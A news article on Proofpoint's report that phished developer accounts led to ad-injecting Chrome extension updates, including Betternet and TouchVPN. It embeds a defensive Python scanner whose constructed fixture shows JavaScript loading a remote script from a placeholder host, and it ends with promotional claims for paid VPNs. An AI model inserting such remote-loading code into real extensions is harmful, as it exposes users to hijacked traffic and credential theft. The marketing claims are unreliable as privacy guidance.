An online security company has revealed that two VPN providers were among eight apps which had their Chrome extensions compromised at the end of June.

According to Proofpoint, both the Betternet and TouchVPN extensions were compromised after their authors' Google account details were stolen in a phishing scam. In reporting the hack, Proofpoint claims that it “resulted in the hijacking of traffic and exposing users to potentially malicious popups and credential theft.”

Victims of a phishing scam

The discovery was made by a group of Proofpoint researchers known as Kafeine. They found that the extension developer had fallen victim to a fairly basic phishing scam: he was redirected to a fake Google login page, which captured his account details when he entered them.

The breach came to light when the developer of the Web Developer for Chrome extension, Chris Pederick, revealed on Twitter that his extension had been hacked on August 2nd. The Proofpoint researchers downloaded the compromised version of this extension and isolated the malicious code to discover how it worked.

They concluded that the motivation behind the hack was, as is so often the case, money. All of the hacked Chrome extensions had code injected which added unwanted JavaScript. This loaded adverts on top of the main programme in an attempt to generate money. The researchers said many of these links were for adult sites, but some users also reported seeing official-looking alerts telling them to repair their PC.
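The defensive counterpart to what the researchers did by hand is to inspect an extension update for the two things the article describes: a content script that suddenly runs on every site, and JavaScript that pulls further code from a remote host at runtime (which lets the ad payload be changed without another store release). The script below is an added illustration and is not Proofpoint's tooling or any vendor's code; the two sample extensions, the `ads.invalid` host and the indicator names are constructed for the example, and the patterns are deliberately simple heuristics rather than a complete detector.

```python
import json
import re
from pathlib import Path

# Heuristic indicators of runtime remote-code loading in extension JavaScript.
# Names are this example's own labels, not an established taxonomy.
REMOTE_SCRIPT_PATTERNS = {
    # document.createElement('script') followed (within ~200 chars) by .src = 'http...'
    "script_element_remote_src": re.compile(
        r"""createElement\(\s*['"]script['"]\s*\).{0,200}?\.src\s*=\s*['"]?https?:""",
        re.DOTALL,
    ),
    # eval()/new Function() are how fetched text becomes executable code
    "eval_or_function_ctor": re.compile(r"""\beval\s*\(|new\s+Function\s*\("""),
    # <script src="http..."> inside packaged HTML pages
    "remote_script_in_html": re.compile(r"""<script[^>]+src\s*=\s*['"]https?://"""),
}

BROAD_HOST_PERMISSIONS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def scan_manifest(manifest_text):
    """Return indicator names for manifest settings that widen an extension's reach."""
    findings = []
    manifest = json.loads(manifest_text)
    for cs in manifest.get("content_scripts", []):
        if "<all_urls>" in cs.get("matches", []):
            findings.append("content_script_all_urls")
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    if any(p in BROAD_HOST_PERMISSIONS for p in perms):
        findings.append("host_permission_all_urls")
    return findings


def scan_files(files):
    """files: {relative_path: text}. Returns a sorted list of (path, indicator)."""
    findings = []
    for path, text in files.items():
        if path == "manifest.json":
            findings += [(path, f) for f in scan_manifest(text)]
            continue
        if not path.endswith((".js", ".html")):
            continue
        for name, pattern in REMOTE_SCRIPT_PATTERNS.items():
            if pattern.search(text):
                findings.append((path, name))
    return sorted(findings)


def scan_directory(root):
    """Scan an unpacked extension on disk (root is the folder holding manifest.json)."""
    root = Path(root)
    files = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in (".json", ".js", ".html"):
            rel = str(p.relative_to(root)).replace("\\", "/")
            files[rel] = p.read_text(errors="replace")
    return scan_files(files)


# Constructed sample: a benign extension, and the same extension after a
# hypothetical ad-injection update. Not the real Betternet or TouchVPN code.
CLEAN_EXTENSION = {
    "manifest.json": json.dumps({
        "name": "Example VPN Helper", "version": "1.0",
        "content_scripts": [{"matches": ["https://example.com/*"], "js": ["helper.js"]}],
    }),
    "helper.js": "document.title = 'VPN connected';\n",
}

TAMPERED_EXTENSION = {
    "manifest.json": json.dumps({
        "name": "Example VPN Helper", "version": "1.0.1",
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["helper.js"]}],
    }),
    "helper.js": (
        "document.title = 'VPN connected';\n"
        "var s = document.createElement('script');\n"
        "s.src = 'https://ads.invalid/loader.js';  // placeholder host, constructed\n"
        "document.head.appendChild(s);\n"
    ),
}

if __name__ == "__main__":
    for label, ext in (("clean", CLEAN_EXTENSION), ("tampered", TAMPERED_EXTENSION)):
        print(label, scan_files(ext))
```

Run against a real unpacked extension with `scan_directory(path)`; an empty result is not a clean bill of health, but a new `content_script_all_urls` or `script_element_remote_src` finding appearing between two versions of the same extension is exactly the kind of change worth reading before trusting the update.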

The Proofpoint researchers noted that “Threat actors continue to look for new ways to drive traffic to affiliate programs and effectively surface malicious advertisements to users. In the cases described here, they are leveraging compromised Chrome extensions to hijack traffic and substitute advertisements on victims’ browsers.”

Flooded with adverts

Both Betternet and TouchVPN are free VPN providers, and both use adverts as one of their means of generating income for their service. Users are therefore used to seeing some adverts. But in the wake of this hack, multiple users reported Chrome being flooded with adverts.

Because the problem only affected Chrome, Betternet were able to isolate the issue and repair it quickly. They claim this was done on the same day it was discovered. TouchVPN is thought to have done the same.

As well as the unwanted advertising, the Proofpoint researchers have warned that some consumers may also have had their personal data compromised, although there is no concrete evidence to date that this has happened.

The risks of using a free VPN

This security breach is not the first time Betternet has been found wanting. As we reported at the beginning of the year, it was one of the free VPN providers found to be “riddled with security vulnerabilities, traffic redirects, and other shady practices” by another group of American researchers.

This latest incident is another reminder of the risks associated with free VPNs. The infrastructure behind a VPN is not cheap and VPN providers have to generate income to cover their costs somehow. If they are providing a free service to users, that means they must be generating income in other ways.

These methods can include advertising, and, like many other online services, they will try to target adverts at their users. This means that they are collecting user data, which is a very risky and insecure practice. It also goes against the very reason most people sign up for a VPN in the first place, but for free VPNs, the need to fund the service has to take priority.

For users who need to bypass online censorship and cannot afford a paid-for VPN, free options like Betternet and TouchVPN serve a purpose. But users should be under no illusion that they are offering the same levels of security and privacy as the reputable VPNs such as ExpressVPN and IPVanish.

Paid-for VPNs only cost a few dollars a month (about the price of a cup of coffee) and for that can offer complete online privacy and security. This is something a free VPN cannot match, and something most free providers have no wish to match.